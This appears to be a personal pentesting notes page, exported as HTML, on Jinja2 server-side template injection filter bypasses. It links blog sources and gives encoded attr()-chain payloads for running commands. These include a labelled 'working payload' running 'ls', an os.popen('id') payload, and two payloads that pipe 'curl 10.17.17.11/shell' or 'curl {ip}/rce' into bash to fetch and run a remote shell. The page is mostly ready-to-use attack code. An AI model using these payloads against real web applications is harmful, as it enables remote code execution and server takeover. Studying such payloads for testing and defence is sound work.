<html>
  
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="../../../../style.css">
    <base target="_parent">
    <title data-trilium-title>filter bypass</title>
  </head>
  
  <body>
    <div class="content">
       <h1 data-trilium-h1>filter bypass</h1>

      <div class="ck-content">
        <p><a href="https://www.onsecurity.io/blog/server-side-template-injection-with-jinja2/">https://www.onsecurity.io/blog/server-side-template-injection-with-jinja2/</a> </p>
        <p><a href="https://0day.work/jinja2-template-injection-filter-bypasses/">https://0day.work/jinja2-template-injection-filter-bypasses/</a> </p>
        <p><a href="https://medium.com/@nyomanpradipta120/jinja2-ssti-filter-bypasses-a8d3eb7b000f">https://medium.com/@nyomanpradipta120/jinja2-ssti-filter-bypasses-a8d3eb7b000f</a> </p>
        <p><code>.</code> are filtered, so we replace them with the attr functions, </p>
        <p>for replacing <code>_</code> we use <code>\x5f</code> but \ is also filtered
          so we use <code>%5c</code>, we also needed to remove the <code>[]</code> which
          were replaced with the attr function and pipes</p><pre><code class="language-text-plain">{{()|attr('%5cx5f%5cx5fclass%5cx5f%5cx5f')|attr('%5cx5f%5cx5fbase%5cx5f%5cx5f')|attr('%5cx5f%5cx5fsubclasses%5cx5f%5cx5f')()}}</code></pre>

        <p>working payload:</p><pre><code class="language-text-plain">{{()|attr('%5cx5f%5cx5fclass%5cx5f%5cx5f')|attr('%5cx5f%5cx5fbase%5cx5f%5cx5f')|attr('%5cx5f%5cx5fsubclasses%5cx5f%5cx5f')()|attr('%5cx5f%5cx5fgetitem%5cx5f%5cx5f')(401)("ls",shell=True,stdout=-1)|attr('communicate')()|attr('%5cx5f%5cx5fgetitem%5cx5f%5cx5f')(0)|attr('decode')('utf-8')}}</code></pre>

        <p>The payload leverages the fact that Flask/Jinja2 templates have the <code>request</code> object
          available to them.</p>
        <p>Leveraging the same tricks, the following payload would execute <code>id</code> using
          Python’s <code>os.popen()</code>:</p><pre><code class="language-text-plain">{{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}</code></pre>

        <p>In regular Python, we are just doing the following:</p><pre><code class="language-text-plain">import os
os.popen('id')</code></pre><pre><code class="language-text-plain">{{request|attr("application")|attr("\x5f\x5fglobals\x5f\x5f")|attr("\x5f\x5fgetitem\x5f\x5f")("\x5f\x5fbuiltins\x5f\x5f")|attr("\x5f\x5fgetitem\x5f\x5f")("\x5f\x5fimport\x5f\x5f")("os")|attr("popen")("curl 10.17.17.11/shell | bash")|attr("read")()}}</code></pre>

        <p>The <code>|</code> indicates to Jija2 that we are applying a filter. The <code>attr()</code> filter
          “get[s] an attribute of an object”. As per the documentation, “<code>foo|attr("bar")</code> works
          like <code>foo.bar</code>.” <code>\x5f</code> is simply the hex representation
          of <code>_</code>.</p>
        <p>If single quote is filtered</p><pre><code class="language-text-plain">{{request|attr("application")|attr("\x5f\x5fglobals\x5f\x5f")|attr("\x5f\x5fgetitem\x5f\x5f")("\x5f\x5fbuiltins\x5f\x5f")|attr("\x5f\x5fgetitem\x5f\x5f")("\x5f\x5fimport\x5f\x5f")("os")|attr("popen")("curl {ip}/rce | bash")|attr("read")()}}</code></pre>
      </div>
    </div>
  </body>

</html>